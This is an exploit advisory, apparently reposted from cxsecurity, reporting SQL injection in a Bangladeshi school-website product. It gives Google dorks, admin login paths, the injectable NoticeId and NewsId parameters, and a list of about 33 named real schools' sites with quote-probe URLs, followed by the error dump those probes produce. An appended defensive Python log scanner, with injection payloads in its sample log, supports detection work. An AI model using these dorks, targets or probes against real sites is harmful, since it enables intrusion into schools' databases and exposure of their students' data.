পাঠশালা inventusltd Software Development Bangladesh Education SQL Injection Vulnerability

2018.11.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : A product of পাঠশালা inventusltd Software Development Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/11/2018
# Vendor Homepage : inventusltd.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.34009
# Google Dorks : intext:''© All rights reserved, A product of পাঠশালা'' site:edu.bd
#                intext:''A product of পাঠশালা'' site:edu.bd
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
DOMAINADDRESSNAMEHERE.inventusltd.com/security/Login
/Home/Login
#################################################################################################
# SQL Injection Exploit :
/Detail/NoticeDetails?NoticeId=[SQL Injection]
/Detail/NewsDetails?NewsId=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
[+] tascam.edu.bd/Detail/NoticeDetails?NoticeId=12%27
[+] bgsc.edu.bd/detail/NoticeDetails?NoticeId=1%27
[+] mbhss.edu.bd/detail/NoticeDetails?NoticeId=1%27
[+] kakm.edu.bd/detail/NoticeDetails?NoticeId=1%27
[+] svgghs.edu.bd/Detail/NoticeDetails?NoticeId=7%27
[+] nazrulshikshalaya.edu.bd/detail/NoticeDetails?NoticeId=1%27
[+] purbarampurahighschool.edu.bd/detail/NoticeDetails?NoticeId=1%27
[+] pgsc.edu.bd/detail/NoticeDetails?NoticeId=1%27
[+] chunkutiagirlshighschool.edu.bd/Detail/NoticeDetails?NoticeId=1%27
[+] aasac.edu.bd/Detail/NewsDetails?NewsId=11%27
[+] tntboyshighschoolbanani.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] sunwaydhaka.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] kpbsc.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] nazneenschoolandcollege.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] jisc.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] banasreemodel.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] bmtfhighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] bahukahighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] bmhjhs.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] purbarampurahighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] bmmf2192.com/Detail/NewsDetails?NewsId=1%27
[+] padhshala.com/Detail/NewsDetails?NewsId=1%27
[+] dogairmodelhighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] rcsc.com.bd/Detail/NewsDetails?NewsId=1%27
[+] gkumb.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] shahidnabihighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] kgchss.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] kamarjurihighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] hajisayedalikhanschoolandcollege.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] silverdale.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] ahsanulhabibhighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] nsahs.edu.bd/Detail/NewsDetails?NewsId=1%27
[+] victoriahighschool.edu.bd/Detail/NewsDetails?NewsId=1%27
#################################################################################################
# SQL Database Error [ ASP.Net MVC SQL Error ] :

Server Error in '/' Application.

The parameters dictionary contains a null entry for parameter 'noticeId' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult NoticeDetails(Int32)' in 'Application.Web.Controllers.DetailController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter.
Parameter name: parameters

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1

Exception Details: System.ArgumentException: The parameters dictionary contains a null entry for parameter 'noticeId' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult NoticeDetails(Int32)' in 'Application.Web.Controllers.DetailController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter.
Parameter name: parameters

Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[ArgumentException: The parameters dictionary contains a null entry for parameter 'noticeId' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult NoticeDetails(Int32)' in 'Application.Web.Controllers.DetailController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter.
Parameter name: parameters]
   System.Web.Mvc.ActionDescriptor.ExtractParameterFromDictionary(ParameterInfo parameterInfo, IDictionary`2 parameters, MethodInfo methodInfo) +658
   System.Web.Mvc.ReflectedActionDescriptor.Execute(ControllerContext controllerContext, IDictionary`2 parameters) +113
   System.Web.Mvc.ControllerActionInvoker.InvokeActionMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +39
   System.Web.Mvc.Async.AsyncControllerActionInvoker.<BeginInvokeSynchronousActionMethod>b__36(IAsyncResult asyncResult, ActionInvocation innerInvokeState) +12
   System.Web.Mvc.Async.WrappedAsyncResult`2.CallEndDelegate(IAsyncResult asyncResult) +139
   System.Web.Mvc.Async.AsyncInvocationWithFilters.<InvokeActionMethodFilterAsynchronouslyRecursive>b__3c() +112
   System.Web.Mvc.Async.<>c__DisplayClass45.<InvokeActionMethodFilterAsynchronouslyRecursive>b__3e() +452
   System.Web.Mvc.Async.<>c__DisplayClass30.<BeginInvokeActionMethodWithFilters>b__2f(IAsyncResult asyncResult) +15
   System.Web.Mvc.Async.<>c__DisplayClass28.<BeginInvokeAction>b__19() +37
   System.Web.Mvc.Async.<>c__DisplayClass1e.<BeginInvokeAction>b__1b(IAsyncResult asyncResult) +241
   System.Web.Mvc.Controller.<BeginExecuteCore>b__1d(IAsyncResult asyncResult, ExecuteCoreState innerState) +29
   System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +111
   System.Web.Mvc.Controller.EndExecuteCore(IAsyncResult asyncResult) +53
   System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +19
   System.Web.Mvc.MvcHandler.<BeginProcessRequest>b__4(IAsyncResult asyncResult, ProcessRequestState innerState) +51
   System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +111
   System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +606
   System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +288

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.34009
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
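A defender-side check for the two injectable endpoints named in the advisory, added here as an example and not part of the original advisory or the vendor's product: it scans web-server access logs and flags any request to /Detail/NoticeDetails or /Detail/NewsDetails whose NoticeId or NewsId value is not a plain integer, which is the only shape an Int32-typed MVC action parameter (as shown in the stack trace above) should ever receive. The log layout (a simplified W3C/IIS field order) and the sample lines are constructed assumptions; the documentation address range 203.0.113.0/24 stands in for real client IPs.

```python
"""Flag requests to the NoticeDetails / NewsDetails endpoints whose id
parameter is not a plain integer. Added example, not advisory or vendor code.

Assumed (simplified) IIS W3C extended log layout, one request per line:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
IIS logs the query string URL-encoded, so '%27' is a literal quote.
"""
import re
from urllib.parse import parse_qs

# Endpoint -> id parameter, both taken from the advisory. Lookup is
# case-insensitive because the listed sites mix /Detail/ and /detail/.
WATCHED = {
    "/detail/noticedetails": "noticeid",
    "/detail/newsdetails": "newsid",
}

# An Int32 action parameter should only ever see an optionally signed
# decimal literal (ASCII digits only; str.isdigit would also accept
# non-ASCII digit characters).
INT_LITERAL = re.compile(r"-?[0-9]+")


def suspicious_id_values(uri_stem, uri_query):
    """Return the non-integer values supplied for the watched id parameter,
    or [] if the request is not a watched endpoint or looks benign."""
    param = WATCHED.get(uri_stem.lower())
    if param is None or uri_query in ("", "-"):
        return []
    # parse_qs URL-decodes values once; a double-encoded '%2527' comes back
    # as '%27', which is still not an integer and is therefore still flagged.
    qs = {k.lower(): v for k, v in
          parse_qs(uri_query, keep_blank_values=True).items()}
    # Blank values are flagged too: that is exactly the "null entry for
    # parameter 'noticeId'" failure the advisory's stack trace shows.
    return [v for v in qs.get(param, []) if not INT_LITERAL.fullmatch(v.strip())]


def parse_log_line(line):
    """Split one log line into its fields; None for '#' header/comment lines
    and for lines that do not have exactly the seven assumed fields."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    return {"time": f"{date} {time}", "ip": ip, "method": method,
            "stem": stem, "query": query, "status": int(status)}


def scan_log(lines):
    """One finding per suspicious request:
    (timestamp, client ip, endpoint, offending values, HTTP status)."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        bad = suspicious_id_values(rec["stem"], rec["query"])
        if bad:
            findings.append((rec["time"], rec["ip"], rec["stem"], bad, rec["status"]))
    return findings


# Constructed sample log, not real traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2018-11-05 10:00:01 203.0.113.5 GET /Detail/NoticeDetails NoticeId=12 200
2018-11-05 10:00:09 203.0.113.5 GET /Detail/NoticeDetails NoticeId=12%27 500
2018-11-05 10:00:15 203.0.113.7 GET /detail/NewsDetails NewsId=1%27 500
2018-11-05 10:00:20 203.0.113.9 GET /Detail/NewsDetails NewsId=1%20OR%201%3D1 200
2018-11-05 10:00:31 203.0.113.9 GET /Detail/NewsDetails NewsId= 500
2018-11-05 10:00:40 203.0.113.2 GET /Home/Login - 200
2018-11-05 10:00:45 203.0.113.2 GET /Detail/NewsDetails newsid=7 200
""".splitlines()

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run against the constructed sample the scan reports four requests (the two quote probes, the `1 OR 1=1` value, and the blank id) and ignores the benign integer requests and the unrelated /Home/Login hit. A 500 status next to a flagged value is the strongest signal, since it matches the unhandled-exception page the advisory reproduces; a 200 next to a tampered value deserves a closer look at the response body. Pairing this with the application-side fix (parameterised queries so that the id never reaches MySQL as text) is what actually closes CWE-89; the log check only tells you who has been probing.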

References:

https://www.cyberizm.org/cyberizm-a-product-of-inventusltd-software-bd-edu-sql-inj-expl.html


Copyright 2018, cxsecurity.com
